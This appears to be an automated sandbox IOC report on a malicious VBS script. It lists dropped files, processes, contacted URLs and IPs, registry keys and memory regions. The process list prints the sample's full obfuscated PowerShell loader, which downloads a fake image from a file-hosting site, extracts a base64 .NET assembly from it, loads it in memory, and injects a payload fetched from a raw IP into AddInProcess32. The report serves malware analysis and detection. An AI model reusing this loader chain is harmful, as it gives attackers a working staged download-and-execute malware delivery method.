IOC Report
0KRPn.vbs

loading gif

Files

File Path
Type
Category
Malicious
0KRPn.vbs
Unicode text, UTF-8 text, with very long lines (11721), with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xa179b67d, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4w43korf.3bs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmjvpzkk.bls.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf0htza0.cxa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwqs5frq.lmr.ps1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0KRPn.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRQBMDgTreEkDgTreRgBFDgTreE4DgTreTwBFDgTreFYDgTreQQBIDgTreFUDgTreTwBZDgTreC8DgTreODgTreDgTrexDgTreC4DgTreMwDgTreyDgTreDEDgTreLgDgTre1DgTreDQDgTreMgDgTreuDgTreDIDgTreNwDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreQQBkDgTreGQDgTreSQBuDgTreFDgTreDgTrecgBvDgTreGMDgTreZQBzDgTreHMDgTreMwDgTreyDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ELIFENOEVAHUOY/81.321.542.271//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
104.21.45.138
malicious
http://172.245.123.18/YOUHAVEONEFILE.txt
172.245.123.18
malicious
https://g.live.com/odclientsettings/Prod1C:
unknown
https://account.dyn.com/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://ip-api.com
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://aka.ms/pscore6
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
uploaddeimagens.com.br
104.21.45.138
malicious
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
104.21.45.138
uploaddeimagens.com.br
United States
malicious
172.245.123.18
unknown
United States
malicious
208.95.112.1
ip-api.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 20 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
24DB922A000
heap
page read and write
1F892C61000
trusted library allocation
page read and write
7FFB226C0000
unkown
page readonly
2E7E000
trusted library allocation
page read and write
24DBB150000
heap
page read and write
7FFB226E2000
unkown
page readonly
1F89AD70000
heap
page execute and read and write
2D81000
trusted library allocation
page read and write
248E145B000
heap
page read and write
8F54FE000
stack
page read and write
248E69D0000
trusted library allocation
page read and write
248E1496000
heap
page read and write
24DB920A000
heap
page read and write
24DB9157000
heap
page read and write
248E6AFC000
heap
page read and write
7FFAACBBD000
trusted library allocation
page execute and read and write
2C42000
trusted library allocation
page read and write
24DB9197000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
248E6AC5000
heap
page read and write
25B83D48000
trusted library allocation
page read and write
F7F000
heap
page read and write
1F880D6A000
heap
page read and write
1F89AD00000
heap
page read and write
248E6A18000
heap
page read and write
11B0000
heap
page read and write
7FFAACBB3000
trusted library allocation
page execute and read and write
B73A37E000
unkown
page readonly
B73A97E000
unkown
page readonly
248E6860000
trusted library allocation
page read and write
2A72000
trusted library allocation
page read and write
1F8832FC000
trusted library allocation
page read and write
7FFB226E0000
unkown
page read and write
6490000
heap
page read and write
B73AD7E000
unkown
page readonly
5FEC000
heap
page read and write
248E1C02000
heap
page read and write
2A76000
trusted library allocation
page execute and read and write
94B0EFF000
stack
page read and write
24DB917C000
heap
page read and write
248E6AED000
heap
page read and write
B73B67B000
stack
page read and write
6EC5F000
unkown
page readonly
24DB91CD000
heap
page read and write
7FFB226D6000
unkown
page readonly
6430000
trusted library allocation
page execute and read and write
248E1330000
heap
page read and write
248E68F0000
trusted library allocation
page read and write
25B85FA1000
trusted library allocation
page read and write
2B70000
trusted library allocation
page read and write
1F89AE10000
heap
page read and write
641E000
stack
page read and write
2A82000
trusted library allocation
page read and write
1F8831B4000
trusted library allocation
page read and write
1F88330F000
trusted library allocation
page read and write
8ECBBFE000
stack
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
24DBAC37000
heap
page read and write
557C000
stack
page read and write
7F090000
trusted library allocation
page execute and read and write
1052000
heap
page read and write
1F883081000
trusted library allocation
page read and write
642B000
trusted library allocation
page read and write
94B13BF000
stack
page read and write
8ECC1FB000
stack
page read and write
7FFAACE60000
trusted library allocation
page read and write
1F882D24000
trusted library allocation
page read and write
1F89ACAD000
heap
page read and write
7FFAACBB4000
trusted library allocation
page read and write
2B80000
heap
page execute and read and write
5927000
trusted library allocation
page read and write
1F881045000
heap
page read and write
F99000
heap
page read and write
102B000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
25B877FC000
trusted library allocation
page read and write
B73A57E000
unkown
page readonly
24DBAC36000
heap
page read and write
248E6C90000
remote allocation
page read and write
248E148D000
heap
page read and write
24DBB17B000
heap
page read and write
1F892C00000
trusted library allocation
page read and write
24DB923C000
heap
page read and write
8F557F000
stack
page read and write
B73AEFE000
stack
page read and write
1F882C91000
trusted library allocation
page read and write
248E1513000
heap
page read and write
1F882D5A000
trusted library allocation
page read and write
248E142B000
heap
page read and write
64A0000
trusted library allocation
page read and write
1F882FD6000
trusted library allocation
page read and write
25B83DCD000
trusted library allocation
page read and write
1F882D07000
trusted library allocation
page read and write
567E000
stack
page read and write
94B143E000
stack
page read and write
1F8826A0000
heap
page readonly
25B82BE1000
trusted library allocation
page read and write
D59000
stack
page read and write
24DBB293000
heap
page read and write
7FFB226E2000
unkown
page readonly
B73BC79000
stack
page read and write
25B83F55000
trusted library allocation
page read and write
B73B07E000
unkown
page readonly
1F880D09000
heap
page read and write
248E6A50000
trusted library allocation
page read and write
1F882B90000
trusted library allocation
page read and write
2C3E000
trusted library allocation
page read and write
5FE4000
heap
page read and write
2B60000
trusted library allocation
page read and write
248E6920000
trusted library allocation
page read and write
B73C37E000
unkown
page readonly
7FFAACDC0000
trusted library allocation
page read and write
248E1C15000
heap
page read and write
1F882D0A000
trusted library allocation
page read and write
2C56000
trusted library allocation
page read and write
24DB921A000
heap
page read and write
1F88319B000
trusted library allocation
page read and write
24DBB2EE000
heap
page read and write
24DB91B5000
heap
page read and write
1F882C17000
trusted library allocation
page read and write
6000000
heap
page read and write
7FFAACE90000
trusted library allocation
page read and write
25B83CEB000
trusted library allocation
page read and write
94B133C000
stack
page read and write
24DB924E000
heap
page read and write
B73ADFE000
stack
page read and write
24DB9470000
heap
page read and write
24DBB2F6000
heap
page read and write
248E1D1A000
heap
page read and write
EC0000
heap
page read and write
F96000
heap
page read and write
24DB91DF000
heap
page read and write
24DBB202000
heap
page read and write
7FFAACEA0000
trusted library allocation
page read and write
8ECB9FE000
stack
page read and write
8ECBFFE000
stack
page read and write
2C4E000
trusted library allocation
page read and write
24DBB251000
heap
page read and write
25B863F9000
trusted library allocation
page read and write
11A3000
trusted library allocation
page execute and read and write
24DBB1AC000
heap
page read and write
2E82000
trusted library allocation
page read and write
B73A47E000
stack
page read and write
248E69C0000
trusted library allocation
page read and write
1F883040000
trusted library allocation
page read and write
1F89AC49000
heap
page read and write
248E1BC0000
trusted library section
page readonly
7FFAACE70000
trusted library allocation
page read and write
248E6AF1000
heap
page read and write
24DB9475000
heap
page read and write
2E90000
trusted library allocation
page read and write
7FFAACEC0000
trusted library allocation
page read and write
8ECB526000
stack
page read and write
24DB9080000
heap
page read and write
248E6934000
trusted library allocation
page read and write
248E1D00000
heap
page read and write
1F880C60000
heap
page read and write
25B803D9000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
24DB924E000
heap
page read and write
94B11BE000
stack
page read and write
248E1BD0000
trusted library section
page readonly
24DB924E000
heap
page read and write
94B1178000
stack
page read and write
B73A67C000
stack
page read and write
FD3000
heap
page read and write
24DBAC21000
heap
page read and write
24DBB1E3000
heap
page read and write
F8B000
heap
page read and write
E90000
heap
page read and write
24DBAC20000
heap
page read and write
24DB91D8000
heap
page read and write
248E6C90000
remote allocation
page read and write
94B12B9000
stack
page read and write
531E000
stack
page read and write
1F89ACA5000
heap
page read and write
8F5153000
stack
page read and write
1F89AE30000
heap
page read and write
24DB91C9000
heap
page read and write
1F883061000
trusted library allocation
page read and write
1F882BE0000
heap
page read and write
1F882720000
heap
page read and write
24DB9150000
heap
page read and write
EA6000
heap
page read and write
94B14BE000
stack
page read and write
7FFB226D6000
unkown
page readonly
B73AFFE000
stack
page read and write
1190000
trusted library allocation
page read and write
B73AE7E000
unkown
page readonly
248E6A57000
heap
page read and write
7FFAACC60000
trusted library allocation
page read and write
7DF41C450000
trusted library allocation
page execute and read and write
24DBAC2A000
heap
page read and write
2C4A000
trusted library allocation
page read and write
248E6949000
trusted library allocation
page read and write
248E68E0000
trusted library allocation
page read and write
1F880CD7000
